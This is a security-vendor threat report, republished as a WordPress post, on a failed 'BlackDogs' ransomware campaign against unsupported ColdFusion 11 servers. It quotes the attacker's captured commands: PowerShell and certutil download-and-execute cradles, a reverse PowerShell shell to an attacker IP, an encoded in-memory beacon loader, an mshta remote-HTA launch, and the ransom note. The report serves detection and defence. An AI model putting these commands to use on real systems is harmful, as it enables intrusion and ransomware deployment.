{"id":23163,"date":"2023-10-19T05:21:04","date_gmt":"2023-10-19T13:21:04","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2023\/10\/19\/news-16893\/"},"modified":"2023-10-19T05:21:04","modified_gmt":"2023-10-19T13:21:04","slug":"news-16893","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2023\/10\/19\/news-16893\/","title":{"rendered":"Ransomware actor exploits unsupported ColdFusion servers\u2014but comes away empty-handed"},"content":{"rendered":"<p><strong>Credit to Author: rajeshnataraj| Date: Thu, 19 Oct 2023 11:00:35 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>Servers are always a point of interest for threat actors as they are one of the most efficient attack vectors to penetrate an organization. Server-related accounts often have the highest privilege levels, making lateral movement to other machines in the network easily achievable.<\/p>\n<p>Sophos X-Ops has observed a wide variety of threats being delivered to servers, with the most common payloads being Cobalt Strike Beacons, ransomware, fileless PowerShell backdoors, miners, and webshells.\u00a0 In September and early October, we saw several efforts by a previously unknown actor to leverage vulnerabilities in obsolete, unsupported versions of Adobe\u2019s ColdFusion Server software to gain access to the Windows servers they ran on and pivot to deploying ransomware. None of these attacks were successful, but they provided telemetry that allowed us to associate them with a single actor or group of actors, and to retrieve the payloads they attempted to deploy.<\/p>\n<p>The files we retrieved showed that the attacker was trying to deploy ransomware created using leaked source code from the LockBit 3.0 ransomware family.\u00a0 We noticed similar ransomware being used in a WS-FTP exploitation campaign. 
In this report, I\u2019ll discuss the telemetry observed in one Sophos customer&#8217;s network and the tools and techniques used. Fortunately, all attempts were blocked by Sophos endpoint behavioral detections that caught suspicious \u201cliving off the land binary\u201d (LoLBIN) process initiations originating from the targeted servers.<\/p>\n<h3>Attack timeline<\/h3>\n<p>Because ColdFusion 11 is no longer patched, and telemetry from the server\u2019s network connections was not available, we were unable to determine which vulnerability was exploited to begin the infiltration of the customer\u2019s network. But shortly after gaining access on September 20, the attackers began testing to see if they could exploit the server further, with a series of commands executed through the ColdFusion Server processes:<\/p>\n<figure id=\"attachment_951806\" aria-describedby=\"caption-attachment-951806\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-951806\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png\" alt=\"Figure 1: A timeline of the attack analyzed in this report. Others occurred before and after this timeframe, starting September 16 and continuing until at least October 5. 
All times are UTC.\" width=\"640\" height=\"360\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png 1200w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png?resize=300,169 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png?resize=768,432 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/blackdogs-ransomwre.png?resize=1024,576 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-951806\" class=\"wp-caption-text\">Figure 1: A timeline of the attack analyzed in this report. Others occurred before and after this timeframe, starting September 16 and continuing until at least October 5. All times are UTC.<\/figcaption><\/figure>\n<p>At 08:30 UTC on September 20, the attacker executes a ping command directed at a host controlled by the attacker\u2014a subdomain of \u201coastify[.]com,\u201d which is connected to the Burp Collaborator Server, a service used for out-of-band application security testing (OAST), an external vulnerability detection toolkit. \u00a0This command, intended to test whether the server was vulnerable to a remote attack, was silently detected and permitted by the server\u2019s endpoint protection:<\/p>\n<pre>\u00a0cmd \/c \"ping mc2a1coghq275g3y1qhnp5u2otukid62[.]oastify[.]com<\/pre>\n<p>Next, at 08:38\u2014after determining that the server could connect to a remote domain\u2014the attacker attempted to execute a remote PowerShell script to download and deploy a Cobalt Strike \u201cbeacon\u201d:<\/p>\n<pre>cmd \/c \"powershell -nop -exec bypass -c \"iex ((new-object net.webclient).downloadstring('hxxp:\/\/&lt;ip&gt;:64\/watchdogs.ps1'))<\/pre>\n<p>This action is blocked by a behavioral rule Access_3b (based on MITRE ATT&amp;CK <a href=\"https:\/\/attack.mitre.org\/techniques\/T1190\/\">technique T1190<\/a>). 
The attacker persisted with multiple attempts to deploy the Cobalt Strike Beacon, but their efforts continued to be thwarted by the &#8220;Access_3b&#8221; rule.<\/p>\n<p>Consequently, at 11:37 the attacker again performed a DNS lookup with the \u201cping\u201d command for a different subdomain of oastify[.]com, double-checking that the targeted server could connect to a remote domain.<\/p>\n<pre>cmd \/c \"ping oh9c6etims79ai806smpu7z4tvzmnhb6[.]oastify[.]com<\/pre>\n<p>With the DNS test once again positive, at 11:45 the attacker attempted to use the Windows command-line Certificate Services utility certutil.exe to download and launch an executable version of the Cobalt Strike Beacon. Again, this was blocked by the Access_3b (T1190) behavioral rule.<\/p>\n<pre>cmd \/c \"certutil.exe -urlcache -split -f hxxp:\/\/&lt;ip&gt;:64\/ftps.exe c:\\windows\\temp\\ftps.exe &amp; start c:\\windows\\temp\\ftps.exe<\/pre>\n<p>The attacker tried this multiple times. But at 11:52, the attacker abandoned that method and attempted to deploy an interactive reverse PowerShell\u2014a fileless PowerShell backdoor intended to operate in the background and execute commands at the attacker&#8217;s discretion. Regrettably (for them), this payload deployment also proved unsuccessful, blocked by the same behavioral rule.<\/p>\n<pre>cmd \/c \"powershell -nop -exec bypass -c \"iex (new-object net.webclient).downloadstring('hxxp:\/\/&lt;ip&gt;:64\/invoke-powershelltcp.ps1');invoke-powershelltcp -reverse -ipaddress &lt;ip&gt; -port 585<\/pre>\n<p>At 12:01, the attacker shifted their strategy again. Their previous efforts involved downloading a PowerShell file and then executing its contents; now they attempted to load an encoded Cobalt Strike Beacon loader directly into memory with PowerShell. 
Unfortunately for them, even this modified deployment method was blocked.<\/p>\n<pre>$s=new-object io.memorystream(,convert]::frombase64string(\"h4siaaaaaaaa\/61xaw\/ishb9npwkf4gekiqm7lxrs89gsxmz2gwml4qkcmekvjblypom\/\/tuguinp9mzlc1eqq6y73lq3kvude.. -<\/pre>\n<p>Their efforts foiled, the attacker waited five days to return to the server armed with newly compiled binaries and a fresh remote attack vector in an attempt to circumvent the existing protections.\u00a0On September 25 at 07:47, they tried their original attack method again\u2014and met with the same outcome. The deployment was blocked.<\/p>\n<pre>cmd \/c \"powershell -nop -exec bypass -c \"iex ((new-object net.webclient).downloadstring('hxxp:\/\/&lt;ip&gt;:64\/watchdogs.ps1'))<\/pre>\n<p>The next day, they started all over again, with a 01:16 \u201cping\u201d test against another random subdomain of oastify[.]com. At 01:23, they attempted again to load an encoded Cobalt Strike Beacon into memory, with further code modifications to evade detection. Once again, it was blocked.<\/p>\n<pre>$s=new-object io.memorystream(,[convert]::frombase64string(\"h4siaaaaaaaa\/61xaw\/ishb9npwkf4gekiqm7lxrs89gsxmz2gwml4qkcmekvjb.. -<\/pre>\n<p>After that failed, at 01:31, they once again tried to leverage certutil.exe to deploy another newly compiled beacon. The attacker&#8217;s efforts continued to be thwarted.<\/p>\n<pre>cmd \/c \"certutil.exe -urlcache -split -f hxxp:\/\/&lt;ip&gt;:64\/ftpss.exe c:windowstempftpss.exe &amp; start c:windowstempftpss.exe<\/pre>\n<p>Running out of options, at \u00a002:27 on September 26, the attacker employed an HTA (HTML Application) file to initiate PowerShell, with the aim of deploying the Cobalt Strike Beacon. 
However, this attempt also ended in failure, as it was blocked by another behavioral rule (C2_10a, based on ATT&amp;CK technique <a href=\"https:\/\/attack.mitre.org\/techniques\/T1071\/001\/\">T1071.001<\/a>).<\/p>\n<pre>cmd \/c \"mshta hxxp:\/\/&lt;ip&gt;:64\/evil.hta<\/pre>\n<p>The threat actor, becoming more desperate, made numerous additional attempts to launch their attacks using HTA files and Cobalt Strike binaries. Frustratingly for them, all of their efforts were consistently thwarted and blocked.<\/p>\n<h3>Exploring the attacker\u2019s repository<\/h3>\n<p>Following the telemetry trail, we found that the attackers had unintentionally left directory listings enabled on the web server hosting their repository of tools, allowing us to explore its contents. Within it, we discovered all the artifacts the attacker had attempted to deploy in the customer environment\u2014as well as the final ransomware payload that the attacker intended to deploy, also sourced from the repository. (All of the payloads we discovered are blocked by Sophos\u2019 defenses.)<\/p>\n<figure id=\"attachment_951808\" aria-describedby=\"caption-attachment-951808\" style=\"width: 327px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/Screenshot-from-2023-10-10-16-20-098.png\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-951808 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/Screenshot-from-2023-10-10-16-20-098.png\" alt=\"Figure 2. A directory of the ransomware actor\u2019s repository on October 10. 
Note that the ransomware has been renamed and Monero mining malware has been added to the repository.\" width=\"327\" height=\"345\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/Screenshot-from-2023-10-10-16-20-098.png 327w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/Screenshot-from-2023-10-10-16-20-098.png?resize=284,300 284w\" sizes=\"auto, (max-width: 327px) 100vw, 327px\" \/><\/a><figcaption id=\"caption-attachment-951808\" class=\"wp-caption-text\">Figure 2. A directory of the ransomware actor\u2019s repository on October 10. Note that the ransomware has been renamed and Monero mining malware has been added to the repository.<\/figcaption><\/figure>\n<p>The ransomware variant, as noted earlier, carries a ransomware note crediting \u201cBlackDog 2023,\u201d and appears to be a new family of ransomware with a possible link to the leaked source code of Lockbit 3.0. This connection becomes apparent when examining both the static executable file\u2019s properties and the similarities in the unpacked code in memory.\u00a0 It triggers the same in-memory protection as that source, Mem\/Lockbit-B.<\/p>\n<p>The actor called themselves \u201cBlackDogs 2023\u201d in the ransom note file that was part of the unsuccessful malware payload:<\/p>\n<pre>BlackDogs 2023 comming   Your data are stolen and encrypted  Please give me 205 Monero and we will give you the decryption program.  Our Monero address : [redacted]   The data will be published on TOR website if you do not pay the ransom   Your personal DECRYPTION ID: [redacted]    Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems!  Using Tox messenger, we will never know your real name, it means your privacy is guaranteed.  If you want to contact us, write in tox. 
[address redacted]      <\/pre>\n<p>205 Monero is roughly the equivalent of $30,000 US.<\/p>\n<h3>Artifacts Coverage<\/h3>\n<p>These artifacts and other indicators of compromise will also be made available on our <a href=\"https:\/\/github.com\/sophoslabs\/IoCs\/blob\/master\/2023-10-ColdFusion-ransomware-IOCs.csv\">GitHub<\/a>.<\/p>\n<h3>The risks of this old software<\/h3>\n<p>Judging by the server installation directory that was exploited in the attack (C:\\ColdFusion11\\cfusion\\bin\\coldfusion.exe), it&#8217;s evident that the targeted customers were running ColdFusion 11.x, a version introduced around 2014. Adobe officially ceased support for this product as of <a href=\"https:\/\/helpx.adobe.com\/support\/programs\/eol-matrix.html\">April<\/a> 30, 2021, so no additional bug fixes or updates are available for this version. It\u2019s uncertain which vulnerability in the server was exploited, but the candidates are numerous.<\/p>\n<p>While endpoint protection can help prevent attackers from leveraging vulnerabilities in old software, there\u2019s no way to close the entry point without patches or updates. That weakens overall protection. It is strongly recommended that customers migrate to newer versions of any internet-facing server product or consider retiring them in favor of a still-supported alternative. 
Where that is not possible, organizations should do as much as possible to mitigate vulnerabilities, isolating servers hosting them from the organization\u2019s network as much as possible and restricting the rights of credentials on those servers to prevent lateral movement if they must reside on the same network.<\/p>\n<h4>Sophos X-Ops would like to acknowledge Mike Wood and Anand Ajjan for their review and feedback on this report.<\/h4>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/10\/19\/ransomware-actor-exploits-coldfusion-servers-but-comes-away-empty-handed\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/10\/broken-lock.jpg\"\/><\/p>\n<p><strong>Credit to Author: rajeshnataraj| Date: Thu, 19 Oct 2023 11:00:35 +0000<\/strong><\/p>\n<p>Multiple LockBit knock-off attacks in September targeting obsolete software foiled, exposing tactics and 
tools.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[30354,15826,129,25671,27339,27030,16771],"class_list":["post-23163","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-adobe-coldfusion","tag-cryptominers","tag-featured","tag-lockbit-ransomware","tag-lolbins","tag-sophos-x-ops","tag-threat-research"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23163","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=23163"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/23163\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=23163"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=23163"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=23163"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}